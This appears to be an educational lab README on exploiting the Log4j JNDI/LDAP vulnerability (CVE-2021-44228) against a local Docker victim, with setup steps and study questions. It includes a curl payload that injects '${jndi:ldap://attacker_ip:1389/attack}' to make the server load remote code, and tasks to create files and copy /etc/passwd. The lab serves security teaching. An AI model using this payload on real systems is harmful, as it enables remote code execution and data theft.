Warning: This Repository is only for educational purposes.
- Index
- Introduction
- Prerequesites
- Setup the environment
- Lab Instructions
- Setting up victim and attacker's environment
- Lab Questions
- References
Welcome to the Log4j lab for PRA9201.
In this lab we will explore the exploitation of Log4j, specifically with JNDI and LDAP (CVE-2021-44228).
This lab works for all Windows, MacOS (Intel and M1) as well as Linux devices.
- Docker (https://docs.docker.com/install/) or Docker Desktop (https://www.docker.com/products/docker-desktop/)
- Java (https://www.oracle.com/technetwork/java/javase/downloads/index.html)
- Maven (https://maven.apache.org/download.cgi)
- Refer to Setup the environment section
Note: The following instruction is for debian based system only.
# Setup Repository
sudo apt update
sudo apt install ca-certificates curl gnupg lsb-release
# Add docker official GPG key
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
# Set docker channel to stable
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
# Install docker engine
sudo apt update
sudo apt install docker-ce docker-ce-cli containerd.io
# Verify docker is working
sudo docker run hello-world
sudo apt update
sudo apt install default-jre
sudo apt update
sudo apt install maven
# Go into /victim folder
cd victim
# Run the victim's server with vulnerability
docker build . -t victim-vulnerable-app
docker run --name victim -p 8080:8080 victim-vulnerable-app
# To verify the above container is working, go to your browser and type in http://ip_addr:8080,
# You should see a page but with error
# Go into /attacker folder
cd attacker
# Package the java program
mvn package
# Run the attacker's malicious LDAP server
# TODO: Figure out how to run the LDAP server
# (Lab Q5.)
# HINT: Run java -jar target/RogueJndi-1.1.jar -h
# HINT 2: What is the attacker's ip?
# Send the attack payload to the victim's server
# HINT: What is the victim's ip?
# NOTE: Make sure you change victim_ip and attacker_ip
curl victim_ip:8080 -H 'X-Api-Version: ${jndi:ldap://attacker_ip:1389/attack}'
# Check docker image to see if the file has been modified/created
Here's the link to google drive for you to clone and write answers in link.
- How does the vulnerability in Log4j work in terms of JNDI?
- What did people do when they discovered the vulnerability?
- What steps did they take to prevent any further exploit?
- Why do you need a dedicated malicious LDAP server, instead of using any of the existing one in the internet?
- Why do you need to execute the java command to spin up a server before you execute curl?
- Execute LDAP Server command to touch a file at /tmp/ha-pwned and provide a screenshot of
ls -la /tmp/
as well as the command executed - Modify the previous command, but now copy /etc/passwd into /tmp/ha-pwned and provide a screenshot of
cat /tmp/ha-pwned
as well as the command executed